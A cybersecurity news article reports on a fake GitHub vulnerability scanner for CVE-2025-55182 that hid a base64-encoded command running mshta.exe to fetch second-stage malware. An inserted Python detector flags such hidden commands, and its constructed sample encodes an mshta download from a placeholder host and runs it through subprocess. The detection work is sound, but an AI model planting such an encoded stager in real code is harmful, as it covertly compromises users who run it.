GitHub Scanner for React2Shell (CVE-2025-55182) Turns Out to Be Malware – Hackread – Cybersecurity News, Data Breaches, AI, and More


A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, also referred to as “React2Shell,” was exposed as malicious after spreading malware. The project, named React2shell-scanner, was hosted under the user niha0wa and has since been removed from the platform following community reports.

Saurabh, a cybersecurity researcher, flagged the now-deleted tool on LinkedIn last week after identifying suspicious behaviour in the code. According to his post, the script included a hidden payload designed to execute mshta.exe and fetch a remote file from py-installer.cc, a known technique used to drop second-stage malware.

Looking at the script confirms the warning. The malware was embedded within react2shellpy.py, where a section of base64-encoded strings was decoded into a PowerShell command.

The malware targeted Windows devices through mshta.exe, a legitimate Windows binary that is frequently abused to run malicious scripts, and pointed it at a custom malicious script hosted on GitHub. The script appeared to execute without prompting the user or raising suspicion.
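As an added illustration (not code from the article or from the repository it describes), the following Python check looks for the pattern described above: base64 string literals in a Python source file that decode to an mshta.exe or PowerShell invocation. The sample "scanner" source, its hidden payload and the host name are constructed placeholders.

```python
import base64
import binascii
import re

# Hypothetical static check (added example, not the article's or the repo's
# code): flag base64 literals that decode to mshta/PowerShell invocations.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")
LOLBIN = re.compile(r"\b(?:mshta|powershell|pwsh|rundll32)\b|-enc(?:odedcommand)?\b", re.I)

def decode_text(raw):
    """Decode a base64 literal to printable text (UTF-8 or UTF-16LE, the
    encoding PowerShell -EncodedCommand uses), or None if it is not text."""
    try:
        data = base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        return None
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = data.decode(enc)
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            return text
    return None

def find_hidden_commands(source):
    """Return (line_no, decoded_text) per literal hiding a command. Literals
    on one line are also tried joined, to catch payloads split into chunks."""
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        chunks = B64_LITERAL.findall(line)
        candidates = chunks + (["".join(chunks)] if len(chunks) > 1 else [])
        for raw in candidates:
            text = decode_text(raw)
            if text and LOLBIN.search(text):
                findings.append((no, text))
    return findings

# Constructed sample "scanner" with a hidden stager; the host is an invalid
# placeholder, not an indicator taken from the real repository.
STAGER = base64.b64encode(b"mshta.exe https://placeholder.invalid/r.hta").decode()
BENIGN = base64.b64encode(b"banner text: React2Shell checker v0.1").decode()
SAMPLE = (
    "import base64, subprocess\n"
    f'BANNER = base64.b64decode("{BENIGN}")\n'
    "def scan(target):\n"
    f'    cmd = base64.b64decode("{STAGER[:18]}" + "{STAGER[18:]}")\n'
    "    subprocess.Popen(cmd, shell=True)\n"
)
```

The benign banner literal is left alone, while the stager is only caught once the two chunks on line 4 are joined, since neither chunk decodes on its own.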

Screenshot of the fake React2Shell (CVE-2025-55182) scanner script hosted on GitHub (Image credit: Saurabh via LinkedIn)

The scanner was aimed at security professionals investigating CVE-2025-55182, presented as something helpful rather than harmful. By posing as a legitimate security utility, it turned normal research activity into an entry point for compromise, putting cybersecurity researchers at risk.

It is worth noting that this came just days after reports showed hackers hiding new PyStoreRAT malware inside utility tools on GitHub, specifically targeting OSINT and cybersecurity researchers.

While GitHub acted quickly and removed the repository, the incident shows that code shared under the banner of cybersecurity tools needs to be reviewed with caution. Simply put, no tool should be trusted blindly just because it’s hosted on a familiar platform.

Saurabh’s full warning can be found here. He urged security professionals to review source code thoroughly before executing any third-party tools, especially those claiming to assist in vulnerability detection.

While the malicious script has been taken down, cached copies or forks may still circulate. Researchers analysing CVE-2025-55182 or similar high-interest vulnerabilities should stay alert for fake exploit tools, especially those with obfuscated code, network callbacks or unclear authorship.
